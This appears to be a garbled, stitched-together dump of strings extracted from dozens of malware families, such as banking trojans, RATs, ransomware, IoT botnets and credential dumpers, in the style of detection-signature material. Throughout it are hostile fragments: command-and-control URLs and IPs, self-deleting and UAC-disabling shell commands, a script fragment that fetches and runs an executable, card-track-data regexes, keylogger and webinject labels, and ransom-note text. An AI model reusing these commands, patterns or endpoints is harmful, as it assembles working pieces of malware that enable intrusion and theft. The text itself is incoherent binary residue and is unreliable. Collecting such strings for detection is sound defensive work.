BwFQB@E%^^ARF^@$!wA'xnpSB`LQZxvzFmMClEwy-~NLZnv'^wYU))C:\\Users\\why\\W.HAgqfgHc|mHg:\\ykcx\\s.Hm
wlH(miansha)<y}uzg|u=server(\xE5\xA3\xB3)|.H&$%':%%:&!Hgqfbqf<
=HFqxqugqHgqfbqf:dpv
MiniAsp3\\Release\\MiniAsp.pdbhttp://%s/about.htmhttp://%s/result_%s.htmopen internet failed
run error!time out,change to mode 0Myname--is:busybox iptables -A INPUT -p tcp --destination-port 7547 -j DROPbusybox iptables -A INPUT -p tcp --destination-port 5555 -j DROP/proc/net/tcp/dev/watchdog/dev/misc/watchdogPMMVFGDCWNVOMVJGPZOJFKRAssl3_ctrl210765qllw;;;;;;GET /mirai/dvrHelperTran Duy LinhDLC Corporationdw20.exeL
StubPath
http://142.91.76.134/p.datHttpDump 1.1S
http://extcitrix.we11point.com/vpn/index.php?ref=1%SystemRoot%\\System32\\svchost.exe -k msupdateManagement Support Team1DTOPTOOLZ Co.,Ltd.0SEOUL1Hello World!CONIN$SetConsoleModeGetEnvironmentStringsGetFileTypeHeapCreateVirtualFreeGetOEMCPFlushFileBuffersSetStdHandleextension: .jpgyahoo kec\\Control\\zxplughttp://www.facebook.com/comment/update.exeShared a shell to %s:%s Successfullyapplication/x-ms-applicationapplication/x-ms-xbapapplication/vnd.ms-xpsdocumentapplication/xaml+xmlapplication/x-shockwave-flashimage/pjpegSet return time error =   %d!Set return time   success!Quit success!msn.klmwmsn.klmbms.klmError %u while loading TSU.DLL %lsGetModuleFileName() failed => %uT
220 LightFTP server v1.0 ready*
PASS->logon successful250 Requested file action okay, completed.m
ProcessHackerF
m?Dm?SFILTERNONECANCELSMSDIVERTMESSnofilter1111111+380678409210_SHUTDOWNEVT_VNCEVT_BACKIE_Hook::GetRequestInfoFF_Hook::getRequestInfoEX_Hook::CreateProcesshijackdll.dllMTX_FF::PR_WriteHook entryFF::PR_WriteHook exitHijackProcessAttach::*** MASTER *** MASTER *** MASTER *** %s PID=%uHijackProcessAttach::entryFF::BEFORE INJECTFF::AFTER INJECTIE::AFTER INJECTIE::BEFORE INJECT*** VNC *** VNC *** VNC *** VNC *** VNC *** VNC *** VNC *** VNC *** VNC *** VNC *** %s*** LOG INJECTS *** %s*** inject to process %s not allowed*** BackSocks *** BackSocks *** BackSocks *** BackSocks *** BackSocks *** BackSocks *** BackSocks *** %s.?AVFF_Hook@@.?AVIE_Hook@@Inject::InjectDllFromMemoryBadSocks.dllextensadv.cctopbeat.ccbrainsphere.cccommonworldme.ccgigacat.ccnw-serv.ccparagua-analyst.ccSpyEye%BOTNAME%globpluginsdata_injectdata_beforedata_afterdata_endbot_versionbot_guidTakeBotGuidTakeGateToCollector[ERROR] : Omfg! Process is still active? Lets kill that mazafaka![ERROR] : Update is not successfull for some reason[ERROR] : dwErr == %uGRABBED DATAwebfakes.dllconfig.datcollectors.txtwebinjects.txtscreenshots.txtbillinghammer.dllblock.dllbugreport.dllccgrabber.dllconnector2.dllcreditgrab.dllcustomconnector.dllffcertgrabber.dllftpbc.dllrdp.dllrt_2_4.dllsocks5.dllspySpread.dllw2chek4_4.dllw2chek4_6.dllE!V
LCallTogether, Inc.QTI International Inc.
win 8.1win Server 2012 R2win Srv 2012win srv 2008 R2win vstawin srv 2003 R2win hm srvwin Strg srv 2003win XP prof x64 edtwin 2000D:\\Acms\\2\\docs\\Visual Studio 2013\\Projects\\DownloadExcute\\DownloadExcute\\Release\\DownExecute.pdbd:\\acms\\2\\docs\\visual studio 2013\\projects\\downloadexcute\\downloadexcute\\downexecute\\json\\rapidjson\\writer.h:\\acms\\2\\docs\\visual studio 2013\\projects\\downloadexcute\\downloadexcute\\downexecute\\json\\rapidjson\\internal/stack.h<Win Get Version Info Name ErrorP@$sw0rd$nd$t@k0v2rF10w|
Download ExcuteEncryptorFunctionPointer %d%s\\%s.lnkMac:%s-Cpu:%s-HD:%sfeed back responce of hostGET Token at hostdwn md5 err\
Can't get the Windows version=M=Q=U=Y=]=a=e=i=m=q=u=y=}=J
%s, ProgID:claveShell_TrayWndmelt.bat\\StubPath\\logs.dat1027|Operation has been canceled!466|You need to plug-in! Double click to install... |33|[Keylogger Not Activated!]TVpTAQEAAAAEAAAA//8AALgAAAATVoAAAAAAAAAAAAAAAAAAAAAAAATVqAAAEAAAAEABAAAAAAAAAAAAATVpQAAIAAAAEAA8A//8AALgAAAAC
exe.tsohcvsexe.ssaslexe.rerolpxeexe.erolpxeiexe.23lldnurexe.dmcexe.llikksatlld.23lenreKlld.ESABLENREKlld.esabtpyrclld.trcvsmLLD.LLDTNpaeHssecorPteGsserddAcorPteGAyrarbiLdaoLteSlortnoCtnerruCnuR\\noisreVtnerruC\\23metsys\\\\23metsyS\\niB.elcyceR$%tooRmetsyS%A
[mimikittenz.MemProcInspector]PROCESS_ALL_ACCESS = PROCESS_TERMINATE | PROCESS_CREATE_THREAD | PROCESS_SET_SESSIONID | PROCESS_VM_OPERATION |IntPtr processHandle = MInterop.OpenProcess(MInterop.PROCESS_WM_READ | MInterop.PROCESS_QUERY_INFORMATION, false, process.Id);&email=.{1,48}&create=.{1,2}&password=.{1,22}&metadata1=[DllImport(\"kernel32.dll\", SetLastError = true)]3AESVERSONEX12CUpdateGates11CUpdateBillZN8CUtility7DeCryptEPciPKciZN13CThreadAttack5StartEP11CCmdMessageMr.BlackVERS0NEX:%s|%d|%d|%sPRIVMSG %s :[STD]Hitting %sNOTICE %s :TSUNAMI <target> <secs>NOTICE %s :I'm having a problem resolving my host, someone will have to SPOOFS me manually.sys_writesys_getdentssys_getdents64sys_getpgidsys_getsidsys_setpgidsys_killsys_tgkillsys_tkillsys_sched_setschedulersys_sched_setparamsys_sched_getschedulersys_sched_getparamsys_sched_setaffinitysys_sched_getaffinitysys_sched_rr_get_intervalsys_wait4sys_waitidsys_rt_tgsigqueueinfosys_rt_sigqueueinfosys_prlimit64sys_ptracesys_migrate_pagessys_move_pagessys_get_robust_listsys_perf_event_opensys_unamesys_unlinksys_unlikatsys_renamesys_readkobject_dellist_del_initinet_ioctlset_fs_rootset_fs_pwd__virt_addr_validinit_fsbad_file_opsbad_file_aio_readsecurity_opsdefault_security_opsaudit_enabledcommit_credsprepare_kernel_credptmx_fopsnode_statesdlopendlsymfopen64__fxstat__fxstat64__lxstat__lxstat64rmdir__xstat__xstat64fdopendir
/tag=info&id=15\\Temp\\iExplorer.exe\\Temp\\\"TSG\"greensky27.vicp.net\
otna.vicp.netsmithking19.gicp.netUser-Agent: webclient\\User.iniUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-EN; rv:1.7.12) Gecko/200\
Connection:Keep-Alive: %dReferer: http://%s:%d/%
password <=14/%ldn.txtKill You\x00D
\x00NetPass Update\x00\x00%s:DOWNLOAD\x00\x00%s:UPDATE\x00\x00%s:uNINSTALL\x00?InjectDll@@YAHPAUHWND__@@K@Z?UnmapDll@@YAHXZ?g_bSubclassed@@3HAaCfG92KXpcSo4Y94BnUrFmnNk27EhW6CqP5EnTad6af8bd5835d19cc7fdc4c62fdf02a1%s?cstorage=shell&comp=%s75BAA77C842BE168B0F66C42C7885997B523F63566F407F3834BCC54AAA32524SVWf
\\MicNS\\NSFreeDll
01+x(*7?*95x;9667getapula.pdbwtsapi32.dllcmpbk32.dllPostMessageAPeekMessageWDispatchMessageWWTSEnumerateSessionsA
\\\\/Applications/Automator.app/Contents/MacOS/DockLightioreg -l | grep \"IOPlatformSerialNumber\" | awk -F+:Users:Shared:UserEvent.app:Contents:MacOS:rm '/Users/Shared/UserEvent.app/Contents/Resources/UserEvent.icns'osascript -e 'tell application \"System Events\" to get the hidden of every login item'osascript -e 'tell application \"System Events\" to get the name of every login item'osascript -e 'tell application \"System Events\" to get the path of every login item'serverVisible \x00.aspack.adataASPack.ASPack.ccgBitArtsDAStub!EPackFSG!kkrunchy.mackt.MaskPEMEW.MPRESS1.MPRESS2.neolite.nsp1.nsp2.nsp0.packedpebundlePEBundlePEC2TOPECompact2pec1pec2PEC2MOPELOCKnt.perplexPESHiELD.petiteProCrypt.RLPackRCryptor.RPCrypt.sforce3.spack.svkpThemida.Themida.Upack.ByDwingUPX0UPX1UPX2.UPX0.UPX1.UPX2.vmp0.vmp1.vmp2VProtectWinLicenWWPACK.yP.y0daMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.; SV1)trj:HTML Err.trj:workFunc start.trj:cmd time out.trj:Thread time out.trj:Create PT done.trj:Create PT error: mutex already exists.Create Pippe Failed!Transfering Fileput Paras Error:Cmd Time Out..Cmd has been killed.H
?<ssylkaustanavlivatpoluchitpereslatderzhatvykhoditNachaloH
z{%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0POST %s HTTP/1.0Accept-Encoding: identity, *;q=0kE
_deamon_initpyi-windows-manifest-filenames061779s061750[OnUpLoadFile][OnDownLoadFile][FileTransfer]---- Not connect the Manager, so start UnInstall ----------- Enter CompressDownLoadDir ---------------- Enter DownLoadDirectory ---------[HandleAdditionalData][mswsocket.dll]msupdate.dll........Enter ThreadCmd!ok1-1msupdate_tmp.dllreplace Rpcss.dll successfully!f:\\loadhiddendriver-mdl\\objfre_win7_x86\\i386\\intelnat.pdb\\drivercashe\\\\microsoft\\windwos\\\\DosDevices\\LOADHIDDENDRIVER\\Device\\LOADHIDDENDRIVERGlobal\\state_mapingE:\\Code\\2.0\\2.0_multi-port\\2.0\\ServerInstall_New-2010-0913_sp3\\msupdataDll\\Release\\msupdate_tmp.pdbGlobal\\unInstall_event_1554_Ower
PAllowIdentity ProtectionAllow for allAVG Firewall Asks For Confirmation0x1A7B4C9F5061636b61676500000000000000000000000000000000000000000000000000000000000000000000000000000000{\\stylesheet{ Normal;}{\\s1 heading 1;}{\\s2 heading 2;}}9E
wsprintfA
seed\x00prot\x00ownin\x00feed0\x00nown\x00sinkholedynadotmalwtrojanabusespamBOOTKIT_DLL.dll
6dNfg8Upn5fBzGgj8licQHblQvLnUY19z5zcNKNFdsDhUzuI8otEsBODrzFCqCKr/safe/record.php_Rm.battry\x0d\x0a\x09\x09\x09\x09  del %sExt.orgAppData\\Local\\Temp\\MicroMedia\\MediaCenter.exe\\Projects\\C#\\Sayad\\Source\\Binder\\obj\\Debug\\Binder.pdbDelphiNative.dllsqlite3.dllb
\\Projects\\C#\\Sayad\\Source\\Client\\bin\\x86\\Debug\\Client.pdbC
9887___skej3sdhaha123
Enterprise Mailing ServiceBlacklisted by rule: %s:%s/SuccessMails?CampaignNum=%ld/TimedOutMails?CampaignNum=%ld/InvalidMails?CampaignNum=%ldFailed to download maillist, retryingNo maillist loadedSuccessfully sent using SMTP account %s (%d of %ld messages to %s)Successfully sent %d of %ld messages to %sSending to %s in the same connectionNew connection required, will send to %sMail transaction for %s is over.Domain %s is bad (found in cache)Domain %s found in cacheDomain %s isn't found in cache, resolving itAll tries to resolve %s failed.Failed to receive response for %s from DNS serverGot DNS server response: domain %s is badGot error %d in response for %s from DNS serverMX's IP for domain %s found in cache:Timeout waiting for domain %s to be resolvedNo valid MXes for domain %s. Marking it as badResolving MX %s using existing connection to DNS serverAll tries to resolve MX for %s are failedResolving MX %s using DNS serverFailed to receive response for MX %s from DNS servert
mkdir %s%s > nul 2>&1p[%s%s%d.%s
lwizvmFEJIKCINZQNDI
DKFKCK
\\amd64\\elrawdsk.pdbR
c:\\oil\\feet\\Seven\\Send\\Gather\\Dividerail.pdbl
SetSystemTimeAdjustment\\payload\\payload.x86.pdbU
PPSWVPPWinSCard.dll/
Esamsrv.dllHookDC.dllCDLocateCSystemSamIRetrievePrimaryCredentialsSamIRetrieveMultiplePrimaryCredentials3
WV5u15V
SQLite format 3
*[S-P-L-I-T]**[H-E-R-E]*FTP~~1~1~0~0n
\x00Remote.dll\x00\x00CGm_PlugBase::\x00ServiceMain\x00_K_H_K_UH\x00\
\x00x86_GmRemote.dll\x00\x00D:\\Project\\GTProject\\Public\\List\\ListManager.cpp\x00\x00GmShutPoint\x00\x00GmRecvPoint\x00\x00GmInitPoint\x00\x00GmVerPoint\x00\x00GmNumPoint\x00_
\x00soul\x00\x00InstallDll.dll\x00\x00_One.dll\x00_Fra.dllCrtRunTime.logProd.tProe.tBurn\\LiveUpdata_Mem\\
_tmpR.vbs_tmpg.vbsDtl.dat3C6FB3CA-69B1-454f-8B2F-BD157762810EEED5CA6C-9958-4611-B7A7-1238F2E1B17E8A8FF8AD-D1DE-4cef-B87C-82627677662E43EE34A9-9063-4d2c-AACD-F5C62B849089A8859547-C62D-4e8b-A82D-BE1479C684C9A59CF429-D0DD-4207-88A1-04090680F714utd_CE31f:\\Project\\T5000\\Src\\Target\\1 KjetDll.pdbl:\\MyProject\\Vc 7.1\\T5000\\T5000Ver1.28\\Target\\4 CaptureDLL.pdbf:\\Project\\T5000\\Src\\Target\\4 CaptureDLL.pdbE:\\VS2010\\xPlat2\\Release\\InstRes32.pdb%s%s.exe_log.txtOpenFileMappingNtCreateUserProcessNtQueryDirectoryFileRtlCreateUserThreadDeleteUrlCacheEntryPR_ReadBEGIN PUBLIC KEYP
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.6)Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)?sessd=&sessc=&sessk=3a08fe7b8c4da6ed09f21c3ef97efce2_ZN11CThreadPool10getBatchesERSt6vectorISt4pairISsiESaIS2_EE_ZNSs4_Rep10_M_destroyERKSaIcE@@GLIBCXX_3.4_ZNSt6vectorImSaImEE13_M_insert_auxEN9__gnu_cxx17__normal_iteratorIPmS1_EERKm_ZNSt6vectorISt4pairISsiESaIS1_EE13_M_insert_auxEN9__gnu_cxx17__normal_iteratorIPS1_S3_EERKS1__ZSt20__throw_out_of_rangePKc@@GLIBCXX_3.4pages.touchpadz.combat.touchpadz.comstat.touchpadz.comsk2.touchpadz.comtreasureHunter.pdbjucheckcmdLineDecryptedbarcodmsports.dllnddeapi.dllglmf32.dll<requestedExecutionLevel level=\"requireAdministrator\" uiAccess=\"false\">cmutil.dllmprapi.dllskype.datskype.iniCreateWindowYIWEFHIWQCreateDesktopMyDesktop
RZIDI_ICON5starter.exewmifw.exeSoftware\\rartmp092.tmptemp1.exeViotto Keyloggermsvbvm60FtpPutFileAVBA6C:\marijuana.txtsIRC4
_/2011/n325423.shtml?wyle\\~ISUN32.EXEI0$9
\x00ScriptManC:\\WINDOWS\\system32\\sysprep\\cryptbase.dllProbeScriptFintProbeScriptKids/c ping -n 2 127.0.0.1 & del \"SysScan.exe\"SysScan DEBUG Mode!!!This rechecking? (set 0/1 or press enter key)http://37.49.224.144:8189/manual_resultChecker end work!Trying send result...BB2FA36AAA9541F0md5=denyip=rmfile=exec_packetbuild_iphdr
/bbs/info.asp\\msinfo.exe%s\\%srcs.pdf\\aumLib.ini9/f30Li5ubO5DNADDxG8s762tqY=
"QBome
X_ID: X_OS: X_BV: InitializeSecurityDescriptorMozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1)Usage: -[start|stop|install|uninstall\\SYSTEM32\\sc.exe config LanmanWorkstationmcfmisvclsremoraservpwfgdumpfgexecfgexecpipeosql\\srcOSQLUSEROSQLPASSWORDOSQLSERVERcmd /c net start %s%ADD%KARTOXAa
REGEXENDRegExprregex[1-5][0-9]{14}=(?!1201|1202|1203|1204|11|10|09|08|07|06|05|04|03|02)[0-9]{5}[0-9]*[47][0-9]{13}=(?!1201|1202|1203|1204|11|10|09|08|07|06|05|04|03|02)[0-9]{5}[0-9]*(?:0[0-5]|[68][0-9])[0-9]{11}=(?!1201|1202|1203|1204|11|10|09|08|07|06|05|04|03|02)[0-9]{5}[0-9]*(?:011|5[0-9]{2})[0-9]{12}=(?!1201|1202|1203|1204|11|10|09|08|07|06|05|04|03|02)[0-9]{5}[0-9]*(?:2131|1800|35\\d{3})\\d{11}=(?!1201|1202|1203|1204|11|10|09|08|07|06|05|04|03|02)[0-9]{5}[0-9]*([0-9]{15,16}[D=](0[7-9]|1[0-5])((0[1-9])|(1[0-2]))[0-9]{8,30})((b|B)[0-9]{13,19}\\^[A-Za-z\\s]{0,30}\\/[A-Za-z\\s]{0,30}\\^(0[7-9]|1[0-5])((0[1-9])|(1[0-2]))[0-9\\s]{3,50}[0-9]{1})[0-9]*\\^[a-zA-Z]*/[a-zA-Z ]*\\^[0-9]*\\d{15,19}=\\d{13,}\\;?[3-9]{1}[0-9]{12,19}[D=\\u0061][0-9]{10,30}\\??[0-9]{12}(?:[0-9]{3})?=(?!1201|1202|1203|1204|11|10|09|08|07|06|05|04|03|02)[0-9]{5}[0-9]*Data.txtTrack1Track2T1_FOUND: %sid=%s&log=%sGET /sets.txtAUTH LOGINReply-ToX-Mailert
fgdump\\pstgdumpchgxp.vbsofficekey.exefindkey.exexpkey.exeDiabloHornProcess Memory Dumperpid-%s.dmpPid %d in not acessiblememdump.exe%s-%d.dmpblazingtools.comK
SearchInjectinject base:Searcher.dlldmpz.log/api/process.php?xy=User-Agent: PCICompliant%s:*:Enabled:%starget pid:scan all processes:<pid> <PATTERN>\\svhst%pceh_3\\.\\ceh_4\\..\\ceh_6Yatoed3fe3rex23030am39497403Poo7lo276670173quai16568unto1828Oleo9eds96006nosysump7hove19CommonFile.exeCallImage.exeBurpSwimWork\\Project\\LoadWortHisnalftp -s:%s\\system32\\winxml.dlltor -f <torrc>tor_umemscanCHEWBAC3
OPSEC_BERNHARDC:\\bernhard\\Debug\\bernhard.pdbU
]\\AppData\\Roaming\\lsacs.exeupdateinterval=cardinterval={[!17!]}{[!18!]}uniqyeidclaxemainhttp://%s/cdosys.php\\The Hook\\Release\\The Hook.pdb\\\\.\\mailslot\\LogCCGET /%s?encoding=%c&t=%c&cc=%I64d&process=d
z:\\Slender\\mozart\\mozart\\Release\\mozart.pdbgarbage.tmp
NCR SelfServ Platform Remote MonitorNCR_RemoteMonitor
Pe1WXCFvYbHo5C
RYG@JAY]R
RYG@@Z
R\KMWMBK\R
R]W]ZKCp?R
RLAAZR
R\KMAXK\WR
R*\KMWMBK LG@R
R^K\HBAI]R
RMA@HGI C]GR
R^\AI\Op?R
R^\AI\Op<R
RIAAIBKR
RZKC^R
RH:LMp?R
ROBB[]Kp?R
R^\AI\Op<R
RO^^JOZOR
R^\AI\Op=R
R^[LBGMRhttp://tuginsaat.com/wp-content/themes/twentythirteen/stats.phpr
seven_legion@india.comFOR DECRYPT FILES
SEND @%s._%02i-%02i-%02i-%02i-%02i-%02i_$%s$.777R
won't be able to recover your files anymore.</p>j
Please restart your computer and wait for instructions for decrypting your files kscdSRomantic9%9R9f9q9I
  </trustInfo>L
:n;t;y;        <requestedExecutionLevel level2
  <trustInfo xmlnssrtWd@@515]5z5C
    <security>    </security>V
      </requestedPrivileges>last.infF
3,31363H3P3m3u3z3</svg>location.href='httpRNDBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAkeme132.DLLklospad.pdbABCXYZ11!DMALOCK!DMALOCK3.0!DMALOCK4.0fso.GetTempName();tmp_path = tmp_path.replace('.tmp', '.exe')var shell = new ActiveXObject('WScript.Shell');shell.run(t'ZoomIt - Sysinternals: www.sysinternals.comM
Software\Locky
<description>WinRAR SFX module</description>B
<!--The ID below indicates application support for Windows 10 -->X
tgwyugwqSwvwnguEnumLocalResWNetOpenEnumW
!SATANA!%s-TryExceptd:\lbetwmwy\uijeuqplfwub.pdbqfntvthbNow it's %I:%M%p.
val is %d
n:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t:;;t;<<t;<<t;<<t;<<t;<<t;<<t;<<t;<<t<<<t;<<t;<<t;<<t;<<t;<<t<<<t<<>>><<<c/a/a/b/a/main/Start.classcon g/con g.perljava/textito.isnMain.classPKplugins/Server.classPKIDPKconfig.iniPKpassword.iniPKLoadStub.classPKLoadStubDecrypted.classPKLoadPassword.classPKDecryptStub.classPKClassLoaders.classPKutil/OSHelperAlienSpyconfig.xmlPKkey.classPKsvd$1.classPKsvd$2.classPKMensaje.classPKinic$ShutdownHook.classUninstall.jarPKresources/icono.pngPKbss_serverCLICK_DELAY
SCK_IDmodInjPEB
f45e373429c0def355ed9feff30eff9ca21eec0fafa1e960bea6068f34209439txtChatUDPFloodBolonyoktedonadoninyse.comNYSEArca_Listing_Fees.pdfbf13-5d45cb40Backup.zipupdates.txtvdirs.datdefault.datmime.datFtpUrlScreenCaptureCaptureMouseI
(Online Banking)|(Online banking)(e-banking)|(e-Banking)e
getVerSendCamListuntPluginYpmw1Syv023QZDwZ2plawBmpf3Pb7RJecerberuscom/crimson/PKcom/crimson/bootstrapJar/PKcom/crimson/permaJarMulti/PermaJarReporter$1.classPKcom/crimson/universal/containers/KeyloggerLog.classPKcom/crimson/universal/UploadTransfer.classPK####@####
####@########@####
####@####EditSvrTLoaderStroksXX-XX-XX-XXCG-CG-CG-CG#BEGIN DARKCOMET DATA --#EOF DARKCOMET DATA --DC_MUTEX-#KCMDDC5#-890#KCMDDC51#-890#BOT#URLUpdateCommand successfully executed!M
FastMM Borland Edition%s, ClassID: %sI wasn't able to open the hosts file#BOT#VisitUrlWEBCAMSTOPUnActiveOnlineKeyStrokes#SendTaskMgr#RemoteScreenSizeping 127.0.0.1 -n 4 > NUL &&deflate 1.1.4 Copyright 1995-2002 Jean-loup GaillyGetClipboardDatacapCreateCaptureWindowALsaRetrievePrivateDataResetSSDTWinSta0\\DefaultGh0st
Gh0st Updatesandbox_avg10_vc9_SP1_2011gholeeRichHa 
1$1,141<1D1L1T1\\1d1l1t1<8;$O' @ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]jYPQTVTSkllZTTXRTUiHceWda/8.848H8O8i8s8y8w
pwwwwwwwwYYuTVWhDDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINytMMMMMMUbbrrrrrxxxxxxxxrriUMMMMMMMMMUuztw
77A779<C<G<M<R<X<9 9-9N9X9s9PostQuitMessagepwlfnn10,gzg_winver7CFC52CD3F87.dllS
havex--></body></head>ANSWERTAG_STARTPATH_BLOCKFILE~
CmdProcessExitedrootDirGetNativeSystemInfo%08x%08x%08x%08xC
KillZoneKillZoneKill[[__M3_F_U_D_M3__]]$M
M3n3gatt1hack3rC
WinHttpGetIEProxyConfigForCurrentUserMETERPRETER_UAGET /123456789 HTTP/1.0C:\\Users\\Logintech\\Dropbox\\Projects\\New folder\\Latest\\Benchmark\\Benchmark\\obj\\Release\\Benchmark.pdbRunPE1082B8C7D3F9105DC66A7E3267C9750CF43E9D325$374e0775-e893-4e72-806c-a8d880a49ae7MonitorinjectionNanoCore.ClientPluginHostIClientNetworkHost#=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGeT
1EF0D55861681D4D208EC3070B720C21D885CB35popthatkitty.Resources.resourcesU4tSOtmpM)
Cy4tOtTmpMtTHVFOrRLmddnIkX%s.Identifier%d:%I64u:%s%s;%s%.2d-%.2d-%.4d[%s] - [%.2d/%.2d/%d %.2d:%.2d:%.2d][Backspace][Tab][Arrow Left][Arrow Up][Arrow Right][Arrow Down][Home][Page Up][Page Down][Break][Print Screen][Scroll Lock][Caps Lock][Alt][Esc][Ctrl+%c]n
DeleteSubKeyget_MachineNameget_UserNameget_LastWriteTimeGetVolumeInformationOSFullNameDownloadDataFM|'|'|nd|'|'|rn|'|'|sc~|'|'|scPK|'|'|CAM|'|'|USB Video Device[endof]rs|'|'|proc|'|'|k|'|'|RG|'|'|~|'|'|kl|'|'|ret|'|'|pl|'|'|lv|'|'|prof|'|'|~|'|'|un|'|'|~[endof]P[endof]Orcus.CommandManagementOrcus.Commands.Orcus.Config.Orcus.Connection.Orcus.Core.Orcus.exeOrcus.Extensions.Orcus.InstallationPromptFormOrcus.MainForm.Orcus.Native.Orcus.Plugins.orcus.plugins.dllOrcus.Properties.Orcus.Protection.Orcus.Share.Orcus.SharedOrcus.StaticCommandsOrcus.Utilities.\\Projects\\Orcus\\Source\\Orcus..orcus.plugins.dll.zip.orcus.shared.dll.zip.orcus.shared.utilities.dll.zip.orcus.staticcommands.dll.zipHvncCommunicationHvncActionhvncDesktopRequestKeyLogCommandget_KeyLogFileLiveKeyloggerCommandORCUS.STATICCOMMANDS, VERSION=PrepareOrcusFileToRemoveConvertFromOrcusValueKindboot.ldrd:\\workplug2.5Plug3.0Shell6GULP
/update?id=%8.8x
DDDD+Proxy-Auth:h
:qTiger324{USER32.DLLlogin.aspcheck.aspresult.aspupload.asp
StubPath
CONNECT %s:%i HTTP/1.0cks=uthj@hadvpackHashtableget_IsDisposedTripleDEStestmemory.FRMMain.resources$
Ap0calypseSifreMsgGosterBaslikDosyalarsInjecsiyonCVu3388fnek3W(3ij3fkp0930diZINGAWI2clWebLightGoldenrodYellowA
$%!aaaaaa1|aaaaaa2|aaaaaa3|aaaaaa4|aaaaaa5|%s%d.exeastalavistagivemecache%s\\system32\\drivers\\blogs\\*bndk13meRandom-Number-Hereconfig.txta/a/a/a/f.classa/a/a/a/l.classa/a/a/b/q.classa/a/a/b/v.classmachinedetailsMySettingssendftppasswordssendbrowserpasswordsarma2keyMasskeylogger
~@1906dark1996coder@SHEmptyRecycleBinAmciSendStringAadd_Shutdownget_SaveMySettingsOnExitget_SpecialDirectoriesClient.MyAvenger by NhTGREAMEH
DecodeProductKeyStartHTTPFloodCodeKeyMESSAGEBOXGetFilezillaPasswordsDataInUDPzSocketsR
A<URL>k__BackingField<RunHidden>k__BackingFieldDownloadAndExecute-
CRYPTPROTECT_PROMPTSTRUCTdiscomouseGetDeepInfoAES_EncryptStartUDPFloodB
kPKstub/stub.dllc.dat
*EDIT_SERVER*
*mlt* = %*ip* = %*victimo* = %*name* = %[START][DATA]We Control Your Digital WorldRC4InitializeRC4DecryptS
GetHashCodeActivatorop_Equalityd
ProjectDataDESCryptoKeepAliveIPNETROWLogClientMessage|ClientHostget_ConnectedCo$
089ParadoxRATStartRMCamFloodersSlowLarisSHITEMIDset_Remote_ChatM
PlasmaRATAntiEverythingh
sSpyTheSpyw
abccbaDanabccbTKeyloggeruFileTransferTTDownloadSETTINGS#@#@#PluginDataOnPluginMessagee-dataquaverse/crypterQrypt.classJarizer.classURLConnection.class!!<3SAFIA<3!!!!ElMattadorDz!!stub_2.Propertiess
get_CurrentDomainabccbaSpyGateRATabccbaStubX.pdbmonikerStringvirustotal1s
EnableLUA /t REG_DWORD /d 0 /f*A01**A02**A03**A04**A05**A06*HostSettingssevane.tmpcmd_.bata2b7c3d7e4cmd.dllDEFPATHHKNAMEHPORTIPATHPANELPATHROOTURLvirusscanpronoipstreamWebcamDOMAIN_PASSWORDStub.Form1.resourcesf
load/IDload/JarMain.classload/MANIFEST.MFplugins/UnrecomServer.class%d_of_%d_for_%s_on_%s/c ping 127.0.0.1 & del /q \"%s\"=%s&type=%d?photoid=iexplorernet start \"%s\"MicroPlayerUpdate.execmd.exe /c rundll32 \"%s\"CCPUpdate
ShadowTechDownloadContainerSystem.Configuration#
QWERTYUIOPLKJHGMNBVCXZLKJHGFDSData$$00Data$$01%c%sDataping localhost -n 9 /c %s > nulWin32AppShimMainNotifyShimsGetHookAPIsIP-INFONetwork-INFOOS-INFOProcess-INFOBrowser-INFOQueryUser-INFOUsers-INFOSoftware-INFO(from environment) = %sNetUserEnumGetNetworkParamsAccelorator<html><title>12356</title><body>G
<>m__Finally8SecureReverseProxyClientDriveDisplayName<IsError>k__BackingFieldset_InstallPathmemcmpurlHistoryset_AllowAutoRedirectlpInitData<FromRawDataGlobal>d__fm
remove_KeyDownProtectedDatam_hotkeysget_Hour\
mdqsaazere-GCCLIBCYGMING-EH-TDM1-SJLJ-GTHR-MINGW32X
5156windows\\system32\\sethc.exeAppData\\Local\\Temp\\Microsoft Word.exepng&w=800&h=600&ei=CnJcUcSBL4rFkQX444HYCw&zoom=1&ved=1t:3588,r:1,s:0,i:92&iact=rc&dur=368&page=1&tbnh=184&tbnw=259&start=0&ndsp=20&tx=114&ty=58Valid_Global_Groups: checking group membership of '%s\\%s'.Usage: %s [-D domain][-G][-P][-c][-d][-h]-D    default user DomainE
Send Failed.in RemoteThreadw
Get Domain:%s IP Failed.Connect To Server Failed.kernel32.dll^G\\.Sus\"Bu56Load3O MYTMP(iM) VALUES (MarathonTool/Blind SQL injection tool based in heavy queriesS
E-mail: cracker_prince@163.com.\\TracKid Log\\%s.txtCoded by princeTracKid.dll%08x -- %sLON\\OD\\O-\\O)\\O%\\O!\\O=\\O9\\O5\\O1\\O%s%08x.001B
Invalid password hash: %s-= MySql Hash Cracker =- Usage: %s hashHash: %08lx%08lxFound pass: Pass not foundT
ShellFoldDefaultPHotLigh[
S.failed_logins \"Failed Login Attempts\", SELECT ROLE, PASSWORD_REQUIRED FROM SYS.DBA_ROLES ORDER BY ROLESELECT spid 'SPID', status 'Status', db_name (dbid) 'Database', loginame 'Login'bcp.exe <:schema:>.<:table:> out \"<:file:>\" -n -S <:server:> -U <:user:> -P <:L.login_policy_name AS \"Login Policy\", mailto:support@sqldbx.comS.last_login_time \"Last Login\", [ ] Resolving PsLookupProcessByProcessIdThe target is most likely patched.Dojibiron by Ronald Huizer, (c) master@h4cker.us .[ ] Creating evil window%sHANDLEF_INDESTROY[+] Set to %d exploit half succeeded/Churraskito/-->Usage: Churraskito.exe \"command\" fuck,can't find WMI process PID./Churraskito/-->Found token %s wmiprvse.exeSELECT * FROM IIsWebInfoIP - %d; Login - %d; Password - %d; Combination - %dIP - 0; Login - 